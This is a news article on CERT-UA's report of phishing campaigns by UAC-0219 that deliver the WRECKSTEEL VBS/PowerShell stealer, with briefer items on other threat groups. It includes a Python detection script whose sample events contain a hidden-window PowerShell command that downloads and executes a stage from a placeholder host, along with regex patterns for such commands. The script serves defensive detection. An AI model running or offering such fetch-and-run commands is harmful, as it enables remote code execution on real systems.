In a concerning revelation, the Computer Emergency Response Team of Ukraine (CERT-UA) has reported three cyberattacks targeting state administration and critical infrastructure. The objective of these attacks appears to be data theft from sensitive governmental entities.
According to CERT-UA, the coordinated campaign utilized compromised email accounts to dispatch phishing emails. These messages contained links to reputable services such as DropMeFiles and Google Drive, designed to mislead recipients. In some cases, these links were embedded within PDF attachments, further lending a veneer of legitimacy.
The phishing attempts were crafted to instill urgency; the emails falsely suggested that a government agency was poised to reduce salaries, prompting recipients to click links to discover the affected personnel. This tactic represents a classic example of social engineering aimed at manipulating user behavior.
Clicking these links initiates the download of a Visual Basic Script (VBS) loader. This malicious code is engineered to retrieve and execute a PowerShell script that scans for files with specific extensions and captures screenshots—a clear indication of the attackers’ intent to exfiltrate sensitive information.
The attacks are connected to a threat group identified as UAC-0219, which has reportedly been active since at least fall 2024. Initial methods employed by this group included the use of EXE binaries, a VBS stealer, and a legitimate image editing tool named IrfanView. Collectively, the VBS loader and PowerShell malware have been branded WRECKSTEEL by CERT-UA, although no specific nation has been implicated in these activities.
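The loader chain described above (a VBS script that fetches and runs a PowerShell stage) leaves a recognisable parent-child trace in process-creation telemetry. The following Python is an added defender-side illustration, not code from CERT-UA or the report: it scans constructed Sysmon-style events for a Windows script host spawning PowerShell with download-and-execute or hidden-window arguments. The event records, file names, URL and the command-line idioms it matches are assumptions chosen for the sample, not indicators taken from the report.

```python
import re

# Constructed Sysmon-style process-creation events (sample data, not from the CERT-UA report).
SAMPLE_EVENTS = [
    {"pid": 4120, "ppid": 3300, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\user\Downloads\salary_list.vbs"'},
    {"pid": 4188, "ppid": 4120,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -c \"IEX((New-Object Net.WebClient)"
                ".DownloadString('http://placeholder.invalid/stage2'))\""},
    # Benign: PowerShell started from Explorer with no download-and-execute arguments.
    {"pid": 5010, "ppid": 3300,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoProfile Get-Service"},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Assumed download-and-execute idioms; tune these to what your environment considers normal.
DOWNLOAD_EXEC = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|invoke-expression|\biex\b", re.I)
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)

def basename(path):
    """Last component of a Windows path, lower-cased (works on non-Windows hosts too)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def find_script_host_to_powershell(events):
    """Flag PowerShell processes whose parent is a script host and whose
    command line shows download-and-execute or hidden-window behaviour."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        if basename(e["image"]) not in POWERSHELL:
            continue
        parent = by_pid.get(e["ppid"])
        if parent is None or basename(parent["image"]) not in SCRIPT_HOSTS:
            continue
        reasons = []
        if DOWNLOAD_EXEC.search(e["cmdline"]):
            reasons.append("download-and-execute command line")
        if HIDDEN_WINDOW.search(e["cmdline"]):
            reasons.append("hidden window")
        if reasons:
            hits.append({"pid": e["pid"], "parent_pid": parent["pid"], "reasons": reasons})
    return hits
```

Run against real telemetry, the same check can be fed from a Sysmon Event ID 1 export, since only the image, parent image and command line fields are used.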
These incidents follow previous phishing campaigns targeting defense and aerospace entities linked to the ongoing conflict in Ukraine, aimed at harvesting webmail credentials via counterfeit login pages.
The DomainTools Investigations team remarked that the phishing pages were seemingly crafted using Mailu, an open-source mail server software found on GitHub. This approach underscores the adversary’s sophisticated tactics designed to replicate organizations central to Ukraine’s defense and telecommunications sectors, indicating an intention to gather intelligence amid the ongoing conflict.
Additionally, the threat landscape includes Russia-aligned intrusion sets like UAC-0050 and UAC-0006, which have engaged in financially motivated spam campaigns since early 2025. These groups have primarily targeted sectors such as government, defense, energy, and NGOs, delivering various malware families including Remcos RAT, SmokeLoader, and others.
Moreover, Kaspersky has highlighted recent threats from a group named Head Mare, which has targeted several Russian entities using a malware called PhantomPyramid, capable of responding to instructions from a command-and-control server and downloading further payloads. Similarly, a threat actor known as Unicorn has infiltrated Russian industrial sectors with a VBS trojan intended to extract files from compromised hosts.
In a related development, SEQRITE Labs has reported that academic, governmental, aerospace, and defense networks in Russia are being targeted through weaponized decoy documents, likely disseminated via phishing emails as part of a campaign referred to as Operation HollowQuill. This activity appears to have originated around December 2024 and employs social engineering tactics to disguise malware-laden PDFs as legitimate communications.
This particular threat actor uses a malicious RAR file containing a .NET malware dropper that releases a Golang-based shellcode loader alongside a legitimate OneDrive application and a decoy PDF including a Cobalt Strike payload, showcasing the increasingly sophisticated methods employed in these cyber operations.